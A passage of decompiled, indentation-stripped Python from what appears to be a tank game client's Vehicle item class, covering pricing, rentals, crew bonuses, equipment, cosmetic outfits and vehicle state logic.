self._canTradeIn = not self.isPurchased and not self.isHidden and self.isUnlocked and not self.isRestorePossible() and self.level in tradeInLevels
self._canTradeOff = self.isPurchased and not self.canNotBeSold and self.intCD not in tradeInData.forbiddenVehicles and self.level in tradeInLevels
if self.canTradeOff:
self._tradeOffPrice = Money(gold=int(math.ceil(self.tradeOffPriceFactor * self.buyPrices.itemPrice.price.gold)))
self._optDevices = self._parserOptDevs(vehDescr.optionalDevices, proxy)
gunAmmoLayout = []
for shell in self.gun.defaultAmmo:
gunAmmoLayout += (shell.intCD, shell.defaultCount)
self._shells = self._parseShells(invData.get('shells', list()), invData.get('shellsLayout', dict()).get(self.shellsLayoutIdx, gunAmmoLayout), proxy)
self._equipment = VehicleEquipment(proxy, invData.get('eqs'))
self._equipmentLayout = VehicleEquipment(proxy, invData.get('eqsLayout'))
defaultCrew = [None] * len(vehDescr.type.crewRoles)
crewList = invData.get('crew', defaultCrew)
self._bonuses = self._calcCrewBonuses(crewList, proxy)
self._crewIndices = dict([ (invID, idx) for idx, invID in enumerate(crewList) ])
self._crew = self._buildCrew(crewList, proxy)
self._lastCrew = invData.get('lastCrew')
self._rentPackages = calcRentPackages(self, proxy)
self._hasModulesToSelect = self.__hasModulesToSelect()
self.__customState = ''
return
@property
def buyPrices(self):
currency = self._buyPrices.itemPrice.price.getCurrency()
if self._personalDiscountPrice is not None and self._personalDiscountPrice.get(currency) <= self._buyPrices.itemPrice.price.get(currency):
currentPrice = self._personalDiscountPrice
else:
currentPrice = self._buyPrices.itemPrice.price
if self.isRented and not self.rentalIsOver:
buyPrice = currentPrice - self.rentCompensation
else:
buyPrice = currentPrice
return ItemPrices(itemPrice=ItemPrice(price=buyPrice, defPrice=self._buyPrices.itemPrice.defPrice), itemAltPrice=self._buyPrices.itemAltPrice)
@property
def searchableUserName(self):
return self._searchableUserName
def getUnlockDescrByIntCD(self, intCD):
for unlockIdx, data in enumerate(self.descriptor.type.unlocksDescrs):
if intCD == data[1]:
return (unlockIdx, data[0], set(data[2:]))
return (-1, 0, set())
def _calcSellPrice(self, proxy):
if self.isRented:
return MONEY_UNDEFINED
price = self.sellPrices.itemPrice.price
defaultDevices, installedDevices, _ = self.descriptor.getDevices()
for defCompDescr, instCompDescr in izip(defaultDevices, installedDevices):
if defCompDescr == instCompDescr:
continue
modulePrice = FittingItem(defCompDescr, proxy).sellPrices.itemPrice.price
price = price - modulePrice
modulePrice = FittingItem(instCompDescr, proxy).sellPrices.itemPrice.price
price = price + modulePrice
return price
def _calcDefaultSellPrice(self, proxy):
if self.isRented:
return MONEY_UNDEFINED
price = self.sellPrices.itemPrice.defPrice
defaultDevices, installedDevices, _ = self.descriptor.getDevices()
for defCompDescr, instCompDescr in izip(defaultDevices, installedDevices):
if defCompDescr == instCompDescr:
continue
modulePrice = FittingItem(defCompDescr, proxy).sellPrices.itemPrice.defPrice
price = price - modulePrice
modulePrice = FittingItem(instCompDescr, proxy).sellPrices.itemPrice.defPrice
price = price + modulePrice
return price
def _calcCrewBonuses(self, crew, proxy):
bonuses = dict()
bonuses['equipment'] = 0.0
for eq in self.equipment.regularConsumables.getInstalledItems():
bonuses['equipment'] += eq.crewLevelIncrease
for battleBooster in self.equipment.battleBoosterConsumables.getInstalledItems():
bonuses['equipment'] += battleBooster.getCrewBonus(self)
bonuses['optDevices'] = self.descriptor.miscAttrs['crewLevelIncrease']
bonuses['commander'] = 0
commanderEffRoleLevel = 0
bonuses['brotherhood'] = tankmen.getSkillsConfig().getSkill('brotherhood').crewLevelIncrease
for tankmanID in crew:
if tankmanID is None:
bonuses['brotherhood'] = 0.0
continue
tmanInvData = proxy.inventory.getItems(GUI_ITEM_TYPE.TANKMAN, tankmanID)
if not tmanInvData:
continue
tdescr = tankmen.TankmanDescr(compactDescr=tmanInvData['compDescr'])
if 'brotherhood' not in tdescr.skills or tdescr.skills.index('brotherhood') == len(tdescr.skills) - 1 and tdescr.lastSkillLevel != tankmen.MAX_SKILL_LEVEL:
bonuses['brotherhood'] = 0.0
if tdescr.role == Tankman.ROLES.COMMANDER:
factor, addition = tdescr.efficiencyOnVehicle(self.descriptor)
commanderEffRoleLevel = round(tdescr.roleLevel * factor + addition)
bonuses['commander'] += round((commanderEffRoleLevel + bonuses['brotherhood'] + bonuses['equipment']) / tankmen.COMMANDER_ADDITION_RATIO)
return bonuses
def _buildCrew(self, crew, proxy):
crewItems = list()
crewRoles = self.descriptor.type.crewRoles
for idx, tankmanID in enumerate(crew):
tankman = None
if tankmanID is not None:
tmanInvData = proxy.inventory.getItems(GUI_ITEM_TYPE.TANKMAN, tankmanID)
tankman = self.itemsFactory.createTankman(strCompactDescr=tmanInvData['compDescr'], inventoryID=tankmanID, vehicle=self, proxy=proxy)
crewItems.append((idx, tankman))
return _sortCrew(crewItems, crewRoles)
@staticmethod
def __crewSort(t1, t2):
return 0 if t1 is None or t2 is None else t1.__cmp__(t2)
def _parseCompDescr(self, compactDescr):
nId, innID = vehicles.parseVehicleCompactDescr(compactDescr)
return (GUI_ITEM_TYPE.VEHICLE, nId, innID)
def _parseShells(self, layoutList, defaultLayoutList, proxy):
shellsDict = dict(((cd, count) for cd, count, _ in LayoutIterator(layoutList)))
defaultsDict = dict(((cd, (count, isBoughtForCredits)) for cd, count, isBoughtForCredits in LayoutIterator(defaultLayoutList)))
layoutList = list(layoutList)
for shot in self.descriptor.gun.shots:
cd = shot.shell.compactDescr
if cd not in shellsDict:
layoutList.extend([cd, 0])
result = list()
for intCD, count, _ in LayoutIterator(layoutList):
defaultCount, isBoughtForCredits = defaultsDict.get(intCD, (0, False))
result.append(self.itemsFactory.createShell(intCD, count, defaultCount, proxy, isBoughtForCredits))
return result
@classmethod
def _parseCustomOutfits(cls, compactDescr, proxy):
outfits = {}
for season in SeasonType.SEASONS:
outfitData = proxy.inventory.getOutfitData(compactDescr, season)
if outfitData:
outfits[season] = cls.itemsFactory.createOutfit(outfitData.compDescr, bool(outfitData.flags & StyleFlags.ENABLED), bool(outfitData.flags & StyleFlags.INSTALLED), proxy)
outfits[season] = cls.itemsFactory.createOutfit()
return outfits
@classmethod
def _parseStyledOutfits(cls, compactDescr, proxy):
outfits = {}
outfitData = proxy.inventory.getOutfitData(compactDescr, SeasonType.ALL)
if not outfitData or not bool(outfitData.flags & StyleFlags.ENABLED):
return outfits
component = customizations.parseCompDescr(outfitData.compDescr)
styleIntCD = vehicles.makeIntCompactDescrByID('customizationItem', CustomizationType.STYLE, component.styleId)
style = vehicles.getItemByCompactDescr(styleIntCD)
for styleSeason in SeasonType.SEASONS:
compDescr = style.outfits.get(styleSeason).makeCompDescr()
outfits[styleSeason] = cls.itemsFactory.createOutfit(compDescr, bool(outfitData.flags & StyleFlags.ENABLED), bool(outfitData.flags & StyleFlags.INSTALLED), proxy)
return outfits
@classmethod
def _parserOptDevs(cls, layoutList, proxy):
result = list()
for i in xrange(len(layoutList)):
optDevDescr = layoutList[i]
result.append(cls.itemsFactory.createOptionalDevice(optDevDescr.compactDescr, proxy) if optDevDescr is not None else None)
return result
@property
def iconContour(self):
return getContourIconPath(self.name)
@property
def iconUnique(self):
return getUniqueIconPath(self.name, withLightning=False)
@property
def iconUniqueLight(self):
return getUniqueIconPath(self.name, withLightning=True)
@property
def shellsLayoutIdx(self):
return (self.turret.descriptor.compactDescr, self.gun.descriptor.compactDescr)
@property
def invID(self):
return self._inventoryID
@property
def xp(self):
return self._xp
@property
def dailyXPFactor(self):
return self._dailyXPFactor
@property
def isElite(self):
return self._isElite
@property
def isFullyElite(self):
return self._isFullyElite
@property
def clanLock(self):
return self._clanLock
@property
def isUnique(self):
return self._isUnique
@property
def rentPackages(self):
return self._rentPackages
@property
def hasRentPackages(self):
return self._hasRentPackages
@property
def isDisabledForBuy(self):
return self._isDisabledForBuy
@property
def isSelected(self):
return self._isSelected
@property
def restorePrice(self):
return self._restorePrice
@property
def canTradeIn(self):
return self._canTradeIn
@property
def canTradeOff(self):
return self._canTradeOff
@property
def tradeOffPriceFactor(self):
return self._tradeOffPriceFactor
@property
def tradeOffPrice(self):
return self._tradeOffPrice
@property
def rotationGroupNum(self):
return self._rotationGroupNum
@property
def rotationBattlesLeft(self):
return self._rotationBattlesLeft
@property
def isRotationGroupLocked(self):
return self._isRotationGroupLocked
@property
def isInfiniteRotationGroup(self):
return self._isInfiniteRotationGroup
@property
def settings(self):
return self._settings
@settings.setter
def settings(self, value):
self._settings = value
@property
def lock(self):
return self._lock
@property
def repairCost(self):
return self._repairCost
@property
def health(self):
return self._health
@property
def gun(self):
return self._gun
@gun.setter
def gun(self, value):
self._gun = value
@property
def turret(self):
return self._turret
@turret.setter
def turret(self, value):
self._turret = value
@property
def engine(self):
return self._engine
@engine.setter
def engine(self, value):
self._engine = value
@property
def chassis(self):
return self._chassis
@chassis.setter
def chassis(self, value):
self._chassis = value
@property
def radio(self):
return self._radio
@radio.setter
def radio(self, value):
self._radio = value
@property
def fuelTank(self):
return self._fuelTank
@fuelTank.setter
def fuelTank(self, value):
self._fuelTank = value
@property
def optDevices(self):
return self._optDevices
@property
def shells(self):
return self._shells
@property
def equipment(self):
return self._equipment
@property
def equipmentLayout(self):
return self._equipmentLayout
@property
def modules(self):
return (self.chassis,
self.turret if self.hasTurrets else None,
self.gun,
self.engine,
self.radio)
@property
def bonuses(self):
return self._bonuses
@property
def crewIndices(self):
return self._crewIndices
@property
def crew(self):
return self._crew
@crew.setter
def crew(self, value):
self._crew = value
@property
def lastCrew(self):
return self._lastCrew
@property
def hasModulesToSelect(self):
return self._hasModulesToSelect
@property
def isRentable(self):
return self.hasRentPackages and not self.isPurchased
@property
def isPurchased(self):
return self.isInInventory and not self.rentInfo.isRented
def isPreviewAllowed(self):
return not self.isInInventory and not self.isSecret
@property
def rentExpiryTime(self):
return self.rentInfo.rentExpiryTime
@property
def rentCompensation(self):
return self.rentInfo.compensations
@property
def isRentAvailable(self):
return self.maxRentDuration - self.rentLeftTime >= self.minRentDuration
@property
def minRentPrice(self):
minRentPackage = self.getRentPackage()
return minRentPackage.get('rentPrice', MONEY_UNDEFINED) if minRentPackage is not None else MONEY_UNDEFINED
@property
def isRented(self):
return self.rentInfo.isRented
@property
def rentLeftTime(self):
return self.rentInfo.getTimeLeft()
@property
def maxRentDuration(self):
return max((item['days'] for item in self.rentPackages)) * self.MAX_RENT_MULTIPLIER * time_utils.ONE_DAY if self.rentPackages else 0
@property
def minRentDuration(self):
return min((item['days'] for item in self.rentPackages)) * time_utils.ONE_DAY if self.rentPackages else 0
@property
def rentalIsOver(self):
return self.isRented and self.rentExpiryState and not self.isSelected
@property
def rentalIsActive(self):
return self.isRented and not self.rentExpiryState
@property
def rentLeftBattles(self):
return self.rentInfo.battlesLeft
@property
def rentExpiryState(self):
return self.rentInfo.getExpiryState()
@property
def descriptor(self):
return self.__descriptor
@property
def type(self):
return set(vehicles.VEHICLE_CLASS_TAGS & self.tags).pop()
@property
def typeUserName(self):
return getTypeUserName(self.type, self.isElite)
@property
def hasTurrets(self):
vDescr = self.descriptor
return len(vDescr.hull.fakeTurrets['lobby']) != len(vDescr.turrets)
@property
def hasBattleTurrets(self):
vDescr = self.descriptor
return len(vDescr.hull.fakeTurrets['battle']) != len(vDescr.turrets)
@property
def ammoMaxSize(self):
return self.descriptor.gun.maxAmmo
@property
def isAmmoFull(self):
return sum((s.count for s in self.shells)) >= self.ammoMaxSize * self.NOT_FULL_AMMO_MULTIPLIER
@property
def hasShells(self):
return sum((s.count for s in self.shells)) > 0
@property
def hasCrew(self):
return findFirst(lambda x: x[1] is not None, self.crew) is not None
@property
def hasEquipments(self):
return findFirst(None, self.equipment.regularConsumables) is not None
@property
def hasOptionalDevices(self):
return findFirst(None, self.optDevices) is not None
@property
def modelState(self):
if self.health < 0:
return Vehicle.VEHICLE_STATE.EXPLODED
return Vehicle.VEHICLE_STATE.DESTROYED if self.repairCost > 0 and self.health == 0 else Vehicle.VEHICLE_STATE.UNDAMAGED
def getState(self, isCurrnentPlayer=True):
ms = self.modelState
if not self.isInInventory and isCurrnentPlayer:
ms = Vehicle.VEHICLE_STATE.NOT_PRESENT
if self.isInBattle:
ms = Vehicle.VEHICLE_STATE.BATTLE
elif self.rentalIsOver:
ms = Vehicle.VEHICLE_STATE.RENTAL_IS_OVER
if self.isPremiumIGR:
ms = Vehicle.VEHICLE_STATE.IGR_RENTAL_IS_OVER
elif self.isTelecom:
ms = Vehicle.VEHICLE_STATE.DEAL_IS_OVER
elif self.isDisabledInPremIGR:
ms = Vehicle.VEHICLE_STATE.IN_PREMIUM_IGR_ONLY
elif self.isInPrebattle:
ms = Vehicle.VEHICLE_STATE.IN_PREBATTLE
elif self.isLocked:
ms = Vehicle.VEHICLE_STATE.LOCKED
elif self.isDisabledInRoaming:
ms = Vehicle.VEHICLE_STATE.SERVER_RESTRICTION
elif self.isRotationGroupLocked:
ms = Vehicle.VEHICLE_STATE.ROTATION_GROUP_LOCKED
ms = self.__checkUndamagedState(ms, isCurrnentPlayer)
if ms in Vehicle.CAN_SELL_STATES and self.__customState:
ms = self.__customState
return (ms, self.__getStateLevel(ms))
def setCustomState(self, state):
self.__customState = state
def getCustomState(self):
return self.__customState
def clearCustomState(self):
self.__customState = ''
def isCustomStateSet(self):
return self.__customState != ''
def __checkUndamagedState(self, state, isCurrnentPlayer=True):
if state == Vehicle.VEHICLE_STATE.UNDAMAGED and isCurrnentPlayer:
if self.isBroken:
return Vehicle.VEHICLE_STATE.DAMAGED
if not self.isCrewFull:
return Vehicle.VEHICLE_STATE.CREW_NOT_FULL
if not self.isAmmoFull:
return Vehicle.VEHICLE_STATE.AMMO_NOT_FULL
if not self.isRotationGroupLocked and self.rotationGroupNum != 0:
return Vehicle.VEHICLE_STATE.ROTATION_GROUP_UNLOCKED
return state
@classmethod
def __getEventVehicles(cls):
return cls.eventsCache.getEventVehicles()
def isRotationApplied(self):
return self.rotationGroupNum != 0
def isGroupReady(self):
return (True, '')
def __getStateLevel(self, state):
if state in (Vehicle.VEHICLE_STATE.CREW_NOT_FULL,
Vehicle.VEHICLE_STATE.DAMAGED,
Vehicle.VEHICLE_STATE.EXPLODED,
Vehicle.VEHICLE_STATE.DESTROYED,
Vehicle.VEHICLE_STATE.SERVER_RESTRICTION,
Vehicle.VEHICLE_STATE.RENTAL_IS_OVER,
Vehicle.VEHICLE_STATE.IGR_RENTAL_IS_OVER,
Vehicle.VEHICLE_STATE.AMMO_NOT_FULL_EVENTS,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_QUEUE,
Vehicle.VEHICLE_STATE.DEAL_IS_OVER,
Vehicle.VEHICLE_STATE.UNSUITABLE_TO_UNIT,
Vehicle.VEHICLE_STATE.ROTATION_GROUP_LOCKED):
return Vehicle.VEHICLE_STATE_LEVEL.CRITICAL
return Vehicle.VEHICLE_STATE_LEVEL.INFO if state in (Vehicle.VEHICLE_STATE.UNDAMAGED, Vehicle.VEHICLE_STATE.ROTATION_GROUP_UNLOCKED) else Vehicle.VEHICLE_STATE_LEVEL.WARNING
@property
def isPremium(self):
return checkForTags(self.tags, VEHICLE_TAGS.PREMIUM)
@property
def isPremiumIGR(self):
return checkForTags(self.tags, VEHICLE_TAGS.PREMIUM_IGR)
@property
def isSecret(self):
return checkForTags(self.tags, VEHICLE_TAGS.SECRET)
@property
def isSpecial(self):
return checkForTags(self.tags, VEHICLE_TAGS.SPECIAL)
@property
def isExcludedFromSandbox(self):
return checkForTags(self.tags, VEHICLE_TAGS.EXCLUDED_FROM_SANDBOX)
@property
def isObserver(self):
return checkForTags(self.tags, VEHICLE_TAGS.OBSERVER)
@property
def isEvent(self):
return self.isOnlyForEventBattles and self in Vehicle.__getEventVehicles()
@property
def isDisabledInRoaming(self):
return checkForTags(self.tags, VEHICLE_TAGS.DISABLED_IN_ROAMING) and self.lobbyContext.getServerSettings().roaming.isInRoaming()
@property
def canNotBeSold(self):
return checkForTags(self.tags, VEHICLE_TAGS.CANNOT_BE_SOLD)
@property
def isUnrecoverable(self):
return checkForTags(self.tags, VEHICLE_TAGS.UNRECOVERABLE)
@property
def isCrewLocked(self):
return checkForTags(self.tags, VEHICLE_TAGS.CREW_LOCKED)
@property
def isOutfitLocked(self):
return checkForTags(self.tags, VEHICLE_TAGS.OUTFIT_LOCKED)
@property
def isDisabledInPremIGR(self):
return self.isPremiumIGR and self.igrCtrl.getRoomType() != constants.IGR_TYPE.PREMIUM
@property
def name(self):
return self.descriptor.type.name
@property
def userName(self):
return getUserName(self.descriptor.type)
@property
def longUserName(self):
typeInfo = getTypeInfoByName('vehicle')
tagsDump = [ typeInfo['tags'][tag]['userString'] for tag in self.tags if typeInfo['tags'][tag]['userString'] != '' ]
return '%s %s' % (''.join(tagsDump), getUserName(self.descriptor.type))
@property
def shortUserName(self):
return getShortUserName(self.descriptor.type)
@property
def level(self):
return self.descriptor.type.level
@property
def fullDescription(self):
return self.descriptor.type.description if self.descriptor.type.description.find('_descr') == -1 else ''
@property
def tags(self):
return self.descriptor.type.tags
@property
def rotationGroupIdx(self):
return self.rotationGroupNum - 1
@property
def canSell(self):
if not self.isInInventory:
return False
st, _ = self.getState()
if self.isRented:
if not self.rentalIsOver:
return False
if st in (self.VEHICLE_STATE.RENTAL_IS_OVER, self.VEHICLE_STATE.IGR_RENTAL_IS_OVER):
st = self.__checkUndamagedState(self.modelState)
return st in self.CAN_SELL_STATES and not checkForTags(self.tags, VEHICLE_TAGS.CANNOT_BE_SOLD)
@property
def isLocked(self):
return self.lock[0] != LOCK_REASON.NONE
@property
def isInBattle(self):
return self.lock[0] == LOCK_REASON.ON_ARENA
@property
def isInPrebattle(self):
return self.lock[0] in (LOCK_REASON.PREBATTLE, LOCK_REASON.UNIT)
@property
def isAwaitingBattle(self):
return self.lock[0] == LOCK_REASON.IN_QUEUE
@property
def isInUnit(self):
return self.lock[0] == LOCK_REASON.UNIT
@property
def typeOfLockingArena(self):
return None if not self.isLocked else self.lock[1]
@property
def isBroken(self):
return self.repairCost > 0
@property
def isAlive(self):
return not self.isBroken and not self.isLocked
@property
def isCrewFull(self):
crew = [ tman for _, tman in self.crew ]
return None not in crew and len(crew)
@property
def isOnlyForEventBattles(self):
return checkForTags(self.tags, VEHICLE_TAGS.EVENT)
@property
def isTelecom(self):
return checkForTags(self.tags, VEHICLE_TAGS.TELECOM)
@property
def isTelecomDealOver(self):
return self.isTelecom and self.rentExpiryState
def hasLockMode(self):
isBS = prb_getters.isBattleSession()
if isBS:
isBSVehicleLockMode = bool(prb_getters.getPrebattleSettings()[PREBATTLE_SETTING_NAME.VEHICLE_LOCK_MODE])
if isBSVehicleLockMode and self.clanLock > 0:
return True
return False
def isReadyToPrebattle(self, checkForRent=True):
if checkForRent and self.rentalIsOver:
return False
if not self.isGroupReady()[0]:
return False
result = not self.hasLockMode()
if result:
result = not self.isBroken and self.isCrewFull and not self.isDisabledInPremIGR and not self.isInBattle and not self.isRotationGroupLocked
return result
@property
def isReadyToFight(self):
if self.rentalIsOver:
return False
if not self.isGroupReady()[0]:
return False
result = not self.hasLockMode()
if result:
result = self.isAlive and self.isCrewFull and not self.isDisabledInRoaming and not self.isDisabledInPremIGR and not self.isRotationGroupLocked
return result
@property
def isXPToTman(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.XP_TO_TMAN)
@property
def isAutoRepair(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_REPAIR)
@property
def isAutoLoad(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_LOAD)
@property
def isAutoEquip(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_EQUIP)
def isAutoBattleBoosterEquip(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_EQUIP_BOOSTER)
@property
def isFavorite(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.GROUP_0)
@property
def isAutoRentStyle(self):
return bool(self.settings & VEHICLE_SETTINGS_FLAG.AUTO_RENT_CUSTOMIZATION)
def isAutoLoadFull(self):
if self.isAutoLoad:
for shell in self.shells:
if shell.count != shell.defaultCount:
return False
return True
def isAutoEquipFull(self):
return self.equipment.regularConsumables == self.equipmentLayout.regularConsumables if self.isAutoEquip else True
def mayPurchase(self, money):
if self.isOnlyForEventBattles:
return (False, 'isDisabledForBuy')
if self.isDisabledForBuy:
return (False, 'isDisabledForBuy')
return (False, 'premiumIGR') if self.isPremiumIGR else super(Vehicle, self).mayPurchase(money)
def mayRent(self, money):
if getattr(BigWorld.player(), 'isLongDisconnectedFromCenter', False):
return (False, GUI_ITEM_ECONOMY_CODE.CENTER_UNAVAILABLE)
if self.isDisabledForBuy and not self.isRentable:
return (False, GUI_ITEM_ECONOMY_CODE.RENTAL_DISABLED)
if self.isRentable and not self.isRentAvailable:
return (False, GUI_ITEM_ECONOMY_CODE.RENTAL_TIME_EXCEEDED)
minRentPrice = self.minRentPrice
return self._isEnoughMoney(minRentPrice, money) if minRentPrice else (False, GUI_ITEM_ECONOMY_CODE.NO_RENT_PRICE)
def mayRestore(self, money):
if getattr(BigWorld.player(), 'isLongDisconnectedFromCenter', False):
return (False, GUI_ITEM_ECONOMY_CODE.CENTER_UNAVAILABLE)
return (False, GUI_ITEM_ECONOMY_CODE.RESTORE_DISABLED) if not self.isRestoreAvailable() or constants.IS_CHINA and self.rentalIsActive else self._isEnoughMoney(self.restorePrice, money)
def mayRestoreWithExchange(self, money, exchangeRate):
mayRestore, reason = self.mayRestore(money)
if mayRestore:
return mayRestore
if reason == GUI_ITEM_ECONOMY_CODE.NOT_ENOUGH_CREDITS and money.isSet(Currency.GOLD):
money = money.exchange(Currency.GOLD, Currency.CREDITS, exchangeRate, default=0)
mayRestore, reason = self._isEnoughMoney(self.restorePrice, money)
return mayRestore
return False
def getRentPackage(self, days=None):
if days is not None:
for package in self.rentPackages:
if package.get('days', None) == days:
return package
elif self.rentPackages:
return min(self.rentPackages, key=itemgetter('rentPrice'))
return
def getGUIEmblemID(self):
return self.icon
def getRentPackageActionPrc(self, days=None):
package = self.getRentPackage(days)
return getActionPrc(package['rentPrice'], package['defaultRentPrice']) if package else 0
def getAutoUnlockedItems(self):
return self.descriptor.type.autounlockedItems[:]
def getAutoUnlockedItemsMap(self):
return dict(((vehicles.getItemByCompactDescr(nodeCD).itemTypeName, nodeCD) for nodeCD in self.descriptor.type.autounlockedItems))
def getUnlocksDescrs(self):
for unlockIdx, data in enumerate(self.descriptor.type.unlocksDescrs):
yield (unlockIdx,
data[0],
data[1],
set(data[2:]))
def getUnlocksDescr(self, unlockIdx):
try:
data = self.descriptor.type.unlocksDescrs[unlockIdx]
except IndexError:
data = (0, 0, set())
return (data[0], data[1], set(data[2:]))
def getPerfectCrew(self):
return self.getCrewBySkillLevels(100)
def getCrewWithoutSkill(self, skillName):
crewItems = list()
crewRoles = self.descriptor.type.crewRoles
for slotIdx, tman in self.crew:
if tman and skillName in tman.skillsMap:
tmanDescr = tman.descriptor
skills = tmanDescr.skills[:]
if tmanDescr.skillLevel(skillName) < tankmen.MAX_SKILL_LEVEL:
lastSkillLevel = tankmen.MAX_SKILL_LEVEL
else:
lastSkillLevel = tmanDescr.lastSkillLevel
skills.remove(skillName)
unskilledTman = self.itemsFactory.createTankman(tankmen.generateCompactDescr(tmanDescr.getPassport(), tmanDescr.vehicleTypeID, tmanDescr.role, tmanDescr.roleLevel, skills, lastSkillLevel), vehicle=self)
crewItems.append((slotIdx, unskilledTman))
crewItems.append((slotIdx, tman))
return _sortCrew(crewItems, crewRoles)
def getCrewBySkillLevels(self, defRoleLevel, skillsByIdxs=None, levelByIdxs=None, nativeVehsByIdxs=None):
skillsByIdxs = skillsByIdxs or {}
levelByIdxs = levelByIdxs or {}
nativeVehsByIdxs = nativeVehsByIdxs or {}
crewItems = list()
crewRoles = self.descriptor.type.crewRoles
for idx, _ in enumerate(crewRoles):
defRoleLevel = levelByIdxs.get(idx, defRoleLevel)
if defRoleLevel is not None:
role = self.descriptor.type.crewRoles[idx][0]
nativeVehicle = nativeVehsByIdxs.get(idx)
if nativeVehicle is not None:
nationID, vehicleTypeID = nativeVehicle.descriptor.type.id
else:
nationID, vehicleTypeID = self.descriptor.type.id
tankman = self.itemsFactory.createTankman(tankmen.generateCompactDescr(tankmen.generatePassport(nationID), vehicleTypeID, role, defRoleLevel, skillsByIdxs.get(idx, [])), vehicle=self)
else:
tankman = None
crewItems.append((idx, tankman))
return _sortCrew(crewItems, crewRoles)
def getOutfit(self, season):
for outfit in (self._styledOutfits.get(season), self._customOutfits.get(season)):
if outfit and outfit.isActive():
return outfit
outfit = Outfit(isEnabled=True, isInstalled=True)
return outfit
def setCustomOutfit(self, season, outfit):
self._customOutfits[season] = outfit
def setOutfits(self, fromVehicle):
for season in SeasonType.SEASONS:
self._customOutfits[season] = fromVehicle.getCustomOutfit(season)
self._styledOutfits[season] = fromVehicle.getStyledOutfit(season)
def getCustomOutfit(self, season):
return self._customOutfits.get(season)
def getStyledOutfit(self, season):
return self._styledOutfits.get(season)
def hasOutfit(self, season):
outfit = self.getOutfit(season)
return outfit is not None
def hasOutfitWithItems(self, season):
outfit = self.getOutfit(season)
return outfit is not None and not outfit.isEmpty()
def getBonusCamo(self):
for season in SeasonType.SEASONS:
outfit = self.getOutfit(season)
if not outfit:
continue
camo = outfit.hull.slotFor(GUI_ITEM_TYPE.CAMOUFLAGE).getItem()
if camo:
return camo
return None
def getAnyOutfitSeason(self):
activeSeasons = []
for season in SeasonType.SEASONS:
if self.hasOutfitWithItems(season):
activeSeasons.append(season)
return random.choice(activeSeasons) if activeSeasons else SeasonType.SUMMER
def isRestorePossible(self):
return self.restoreInfo.isRestorePossible() if not self.isPurchased and not self.isUnrecoverable and self.lobbyContext.getServerSettings().isVehicleRestoreEnabled() and self.restoreInfo is not None else False
def isRestoreAvailable(self):
return self.isRestorePossible() and not self.restoreInfo.isInCooldown()
def hasLimitedRestore(self):
return self.isRestorePossible() and self.restoreInfo.isLimited() and self.restoreInfo.getRestoreTimeLeft() > 0
def hasRestoreCooldown(self):
return self.isRestorePossible() and self.restoreInfo.isInCooldown()
def isRecentlyRestored(self):
return self.isPurchased and self.restoreInfo.isInCooldown() if self.restoreInfo is not None else False
def __cmp__(self, other):
if self.isRestorePossible() and not other.isRestorePossible():
return -1
if not self.isRestorePossible() and other.isRestorePossible():
return 1
return cmp(other.hasLimitedRestore(), self.hasLimitedRestore()) or cmp(self.restoreInfo.getRestoreTimeLeft(), other.restoreInfo.getRestoreTimeLeft()) if self.isRestorePossible() and other.isRestorePossible() else super(Vehicle, self).__cmp__(other)
def __eq__(self, other):
return False if other is None else self.descriptor.type.id == other.descriptor.type.id
def __repr__(self):
return 'Vehicle<id:%d, intCD:%d, nation:%d, lock:%s>' % (self.invID,
self.intCD,
self.nationID,
self.lock)
def _mayPurchase(self, price, money):
return (False, GUI_ITEM_ECONOMY_CODE.CENTER_UNAVAILABLE) if getattr(BigWorld.player(), 'isLongDisconnectedFromCenter', False) else super(Vehicle, self)._mayPurchase(price, money)
def _getShortInfo(self, vehicle=None, expanded=False):
description = i18n.makeString('#menu:descriptions/' + self.itemTypeName)
caliber = self.descriptor.gun.shots[0].shell.caliber
armor = findVehicleArmorMinMax(self.descriptor)
return description % {'weight': BigWorld.wg_getNiceNumberFormat(float(self.descriptor.physics['weight']) / 1000),
'hullArmor': BigWorld.wg_getIntegralFormat(armor[1]),
'caliber': BigWorld.wg_getIntegralFormat(caliber)}
def _sortByType(self, other):
return compareByVehTypeName(self.type, other.type)
def __hasModulesToSelect(self):
components = []
for moduleCD in self.descriptor.type.installableComponents:
moduleType = getTypeOfCompactDescr(moduleCD)
if moduleType == GUI_ITEM_TYPE.FUEL_TANK:
continue
if moduleType in components:
return True
components.append(moduleType)
return False
def getTypeUserName(vehType, isElite):
return i18n.makeString('#menu:header/vehicleType/elite/%s' % vehType) if isElite else i18n.makeString('#menu:header/vehicleType/%s' % vehType)
def getTypeShortUserName(vehType):
return i18n.makeString('#menu:classes/short/%s' % vehType)
def _getLevelIconName(vehLevel, postfix=''):
return 'tank_level_%s%d.png' % (postfix, int(vehLevel))
def getLevelBigIconPath(vehLevel):
return '../maps/icons/levels/%s' % _getLevelIconName(vehLevel, 'big_')
def getLevelSmallIconPath(vehLevel):
return '../maps/icons/levels/%s' % _getLevelIconName(vehLevel, 'small_')
def getLevelIconPath(vehLevel):
return '../maps/icons/levels/%s' % _getLevelIconName(vehLevel)
def getIconPath(vehicleName):
return '../maps/icons/vehicle/%s' % getItemIconName(vehicleName)
def getContourIconPath(vehicleName):
return '../maps/icons/vehicle/contour/%s' % getItemIconName(vehicleName)
def getSmallIconPath(vehicleName):
return '../maps/icons/vehicle/small/%s' % getItemIconName(vehicleName)
def getUniqueIconPath(vehicleName, withLightning=False):
return '../maps/icons/vehicle/unique/%s' % getItemIconName(vehicleName) if withLightning else '../maps/icons/vehicle/unique/normal_%s' % getItemIconName(vehicleName)
def getTypeSmallIconPath(vehicleType, isElite=False):
key = vehicleType + '.png'
return RES_ICONS.maps_icons_vehicletypes_elite(key) if isElite else RES_ICONS.maps_icons_vehicletypes(key)
def getTypeBigIconPath(vehicleType, isElite):
key = 'big/' + vehicleType
if isElite:
key += '_elite'
key += '.png'
return RES_ICONS.maps_icons_vehicletypes(key)
def getUserName(vehicleType, textPrefix=False):
return _getActualName(vehicleType.userString, vehicleType.tags, textPrefix)
def getShortUserName(vehicleType, textPrefix=False):
return _getActualName(vehicleType.shortUserString, vehicleType.tags, textPrefix)
def _getActualName(name, tags, textPrefix=False):
if checkForTags(tags, VEHICLE_TAGS.PREMIUM_IGR):
if textPrefix:
return i18n.makeString(ITEM_TYPES.MARKER_IGR, vehName=name)
